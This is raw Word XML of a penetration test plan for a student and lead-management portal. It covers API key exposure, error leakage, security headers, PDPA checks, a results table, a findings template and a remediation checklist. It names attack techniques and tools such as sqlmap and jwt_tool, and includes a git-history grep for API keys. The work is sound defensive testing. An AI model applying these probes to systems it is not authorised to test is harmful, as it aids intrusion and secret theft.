              <w:t xml:space="preserve">Verify that the email confirmation template uses a properly parameterised email library, not string concatenation.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email header fields must be sanitised of newline characters (\r, \n) before being passed to the email service SDK. Email sending must use the official SDK (Resend/SendGrid) with typed parameters, not raw SMTP string construction. No injected headers must appear in sent emails.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email delivery log review, Resend/SendGrid dashboard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PT-EMAIL-002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Email API Key Exposure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CR-04 Module D — NFR 12.1, FR-153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transactional email API key (Resend/SendGrid) is not exposed in client-side code, API responses, or error messages.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Inspect all JavaScript bundles served to the browser via browser DevTools &gt; Sources.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Search for 'API_KEY', 'RESEND', 'SENDGRID', 'Bearer' in all client-side JS.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Trigger intentional API errors (malformed email format) and inspect error responses for key leakage.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Check the public GitHub repository (github.com/frieta10) for any committed .env files or API keys.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the Vercel environment variables are not exposed via any public route.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Call GET /api/settings/public and verify only public-safe settings are returned.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No API keys must appear in client-side JavaScript bundles. Error responses must not include Resend/SendGrid error objects that contain authentication details. GitHub history must be clean. /api/settings/public must not return email_api_key or any server-side secret.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Browser DevTools, GitHub search, git log --all -p | grep API_KEY, Burp Suite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80"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4.7  Security Headers &amp; Information Disclosure</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PT-INFO-001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API Error Message Information Leakage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All API Routes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F39C12"/>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API errors do not expose stack traces, database schema, file system paths, or internal configuration details.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Send malformed JSON to POST /api/join/{code}: {invalid json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Send a request with an invalid Content-Type header to all POST endpoints.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Trigger a 500 error by sending an unexpectedly large payload.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Send special characters in all UUID path parameters.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Review all 4xx and 5xx responses for internal error details.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All API error responses must return generic, user-friendly messages. HTTP 500 responses must not include stack traces, Prisma error messages, or database connection strings. Error details must only be logged server-side (Vercel logs), never returned to the client.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curl, OWASP ZAP active scan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PT-INFO-002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HTTP Security Headers Audit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All Public Pages — CR-04 Module F, NFR 12.1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F39C12"/>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all required HTTP security headers are present and correctly configured on all public routes.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Use curl -I https://sulfri-portal.vercel.app on all public pages.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Check for presence and correctness of: Content-Security-Policy (must include Credly domains), X-Frame-Options or CSP frame-ancestors, X-Content-Type-Options: nosniff, Referrer-Policy, Strict-Transport-Security (HSTS), Permissions-Policy.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify CSP does not use 'unsafe-inline' for scripts without nonce.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify CSP allows only https://cdn.credly.com for script-src and https://www.credly.com for frame-src.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Run the site through securityheaders.com.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Grade A or B on securityheaders.com. CSP must include only necessary Credly domains and must not use wildcard (*) for script-src. HSTS with min-age 31536000 must be present. X-Content-Type-Options: nosniff must be present on all responses.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curl, securityheaders.com, OWASP ZAP, Mozilla Observatory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00"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4.8  PDPA Compliance &amp; Data Protection</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PT-PDPA-001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IP Address Hashing Verification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Analytics — CR-04 Module E, NFR 12.3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F39C12"/>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analytics_events table stores hashed IP addresses and never raw IP addresses, per PDPA compliance requirement.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Submit a PDF download event to POST /api/analytics/track from a known IP.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">As admin, query the analytics events in the admin BI dashboard.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Inspect the stored ip_hash value — verify it is a hash (e.g., SHA-256 hex string), not a raw IP.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to reverse the hash — confirm it is not a simple MD5 of the IP (use SHA-256 with salt).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that the raw IP is never logged in Vercel function logs for analytics events.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The ip_hash field must contain a non-reversible hash (SHA-256 or better, with a server-side salt). Raw IP addresses must never appear in the database. The analytics track endpoint must accept and hash the IP server-side, not client-side.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Burp Suite, database inspection (admin), hash analysis tools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Test ID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PT-PDPA-002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Right to Erasure — Lead Deletion (CR-04)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Module / SRS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CR-04 Module D — NFR 12.3, FR-150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Risk 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F39C12"/>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Verify that the admin can permanently delete individual lead records upon request, satisfying PDPA Right to Erasure obligations.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Test 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pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Create a test lead record via the event registration or proposal form.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">As admin, navigate to /admin/pipeline and locate the test lead.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirm that a 'Delete' or 'Erase' action is available (permanently, not just archive).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Execute the deletion and verify the record is removed from the database.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that related records (email_log, lead_course_selections) are also deleted or anonymised via CASCADE.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the exported CSV no longer contains the deleted record.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Expected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6B1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin must be able to permanently delete any individual lead record. Deletion must cascade to all related tables. The deleted record must not appear in exports, pipeline view, or any API response after deletion.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9"/>
                <w:szCs w:val="19"/>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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin UI testing, database inspection, API response verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Test Results Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete the table below during and after testing. Mark each test case as Pass, Fail, or N/A. Document evidence (screenshots, request/response logs) in a separate evidence folder referenced by Test ID.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
              <w:bottom w:val="single" w:color="E67E22" w:sz="1"/>
              <w:right w:val="single" w:color="E67E22" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3CD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="7D5A00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  Attach Burp Suite project file, OWASP ZAP report, and screenshot evidence as appendices to this document. Reference each artefact by Test ID in the Notes / Evidence column.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900"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="18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Test ID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Test Name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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Notes / Evidence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PT-AUTH-001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Admin login brute force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Authentication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PT-AUTH-002</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JWT token tampering</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Authentication</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PT-AUTH-003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Unauthorised admin route access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Authentication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PT-AUTH-004</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Session fixation / replay</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Authentication</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PT-INJ-001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SQL injection — registration form</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Student Reg.</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PT-INJ-002</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SQL injection — search fields</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Reg. Mgmt.</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PT-INJ-003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XSS — public profile fields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Profile</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PT-INJ-004</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XSS — join code input</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Class Mgmt.</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PT-INJ-005</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SSTI in proposal generator</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CR-04 Mod C</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PT-FILE-001</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Malicious file upload (PDF module)</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Downloads</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PT-FILE-002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Path traversal in file URL</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Downloads</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PT-FILE-003</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PDF generation path exposure</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CR-04 Mod A</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PT-CREDLY-001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Malicious Credly embed code injection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CR-01</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PT-CREDLY-002</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CSP bypass via Credly domain</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CR-01</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PT-RATE-001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Rate limit — /api/event/register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CR-03</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PT-RATE-002</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Rate limit — /api/proposal/submit</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CR-04 Mod C</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PT-RATE-003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Rate limit — admin login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Auth</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PT-IDOR-001</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IDOR on class registrations</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Reg. Mgmt.</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PT-IDOR-002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IDOR on lead pipeline records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CR-04 Mod D</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PT-IDOR-003</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IDOR on badge records</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CR-01</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PT-INFO-001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API error message info leakage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All APIs</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PT-INFO-002</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HTTP security headers audit</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All Pages</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PT-INFO-003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Robots.txt / sitemap exposure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CR-04 Mod F</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PT-EMAIL-001</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Email header injection</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CR-04 Mod D</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PT-EMAIL-002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API key exposure in response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CR-04 Mod D</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PT-PDPA-001</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IP hash bypass / raw IP storage</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Analytics</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PT-PDPA-002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Consent flag bypass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CR-03, CR-04</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PT-GA4-001</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GA4 ID exposure in client bundle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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CR-04 Mod E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Pass / Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Findings Report Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For each FAIL result in the results table, complete one findings record using the template below. Assign a sequential Finding ID (e.g., FIND-001).</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Finding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FIND-001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3A5F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case Ref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e.g., PT-INJ-001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Descriptive title of the vulnerability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3A5F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk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Critical / High / Medium / Low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OWASP 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e.g., A03:2021 Injection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3A5F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Component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e.g., POST /api/join/{join_code}, field: email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Detailed description of the vulnerability and how it was discovered.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3A5F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof of Concept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Step-by-step reproduction. Include request/response snippets (redact sensitive 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What could an attacker achieve? Data breach, account takeover, service disruption?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3A5F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommendation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Specific, actionable fix for the developer. Reference the relevant SRS/CR requirement.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Open / In Remediation / Resolved / Accepted Risk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3A5F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Retest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Date retest was conducted after fix.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E3A5F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Retest 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777777"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass / Fail — brief note on retest outcome.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Remediation Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following controls must be verified as implemented before signing off the security review. This checklist is derived from the SRS v1.0 security requirements and all CR security amendments.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00"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1280"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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6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Control Requirement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SRS Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="128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Passwords are hashed using bcrypt (min cost factor 12)</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SRS §8.1</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2</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All admin routes protected with valid JWT / NextAuth session check</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SRS §5.1</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3</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JWT 'alg:none' attack prevented — algorithm verified server-side</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SRS §5.1</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4</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All Prisma ORM queries are parameterised (no raw SQL with user input)</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SRS §8.1</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5</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CSP header includes only cdn.credly.com and www.credly.com (no wildcard)</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CR-01 §7</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6</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Badge embed stores only 4 allowed fields — no raw script tags stored</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CR-01 FR-31</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7</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Rate limit on /api/join/{code}: enforced server-side, not header-based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SRS §8.1</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8</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Rate limit on /api/event/register: 10/IP/hour</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CR-03 §8.1</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9</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Rate limit on /api/proposal/submit: 5/IP/hour</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CR-04 §12.1</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10</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Consent flag enforced at API layer — not UI-only</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CR-03 FR-70</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11</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Email API key in env variable only — not in DB or client bundle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CR-04 §12.1</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12</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Email templates use typed SDK — no raw SMTP string concatenation</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CR-04 FR-153</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13</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PDF generation does not expose internal file paths in output</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CR-04 §12.1</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14</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File uploads validated server-side: type, size, and MIME check</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SRS §5.6</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15</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Download responses set Content-Disposition: attachment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SRS §5.6</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16</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IP addresses hashed (SHA-256 + salt) before storage in analytics_events</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CR-04 §12.3</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17</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Admin can permanently delete lead records (Right to Erasure)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CR-04 §12.3</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18</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GA4 Measurement ID injected server-side — not hard-coded in client bundle</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CR-04 §12.1</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19</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robots.txt blocks /admin routes from indexing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CR-04 FR-173</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20</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HTTPS enforced — no HTTP fallback on any route</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SRS §8.1</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21</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X-Content-Type-Options: nosniff present on all responses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CR-04 Module F</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22</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Strict-Transport-Security (HSTS) header present with min-age 31536000</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CR-04 Module F</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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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All public API error responses are generic — no stack traces returned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i/>
                <w:iCs/>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SRS §8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[ ]  Pass  [ ]  Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Credly OB3 auto-sync only calls https://www.credly.com (no other hosts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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i/>
                <w:iCs/>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CR-01 §7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="128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color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[ ]  Pass  [ ]  Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Recommended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Tool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Use Case in This Engagement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Burp Suite Community/Pro</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Web Proxy / Scanner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Intercept and modify all HTTP requests, run active scans on all API endpoints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OWASP ZAP</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Web Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="45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Automated active scan on public routes for common vulnerabilities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sqlmap</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SQL Injection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Automated SQL injection testing on all form inputs and URL parameters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jwt_tool</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JWT Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="45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Test JWT algorithm confusion, signature bypass, token tampering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Postman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API Testing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Manual API endpoint testing with custom headers and payloads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curl</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HTTP Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="45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Quick header inspection, rate limit testing, file download validation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exiftool</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Metadata Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Inspect generated PDF metadata for path or version exposure</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securityheaders.com</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Header Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
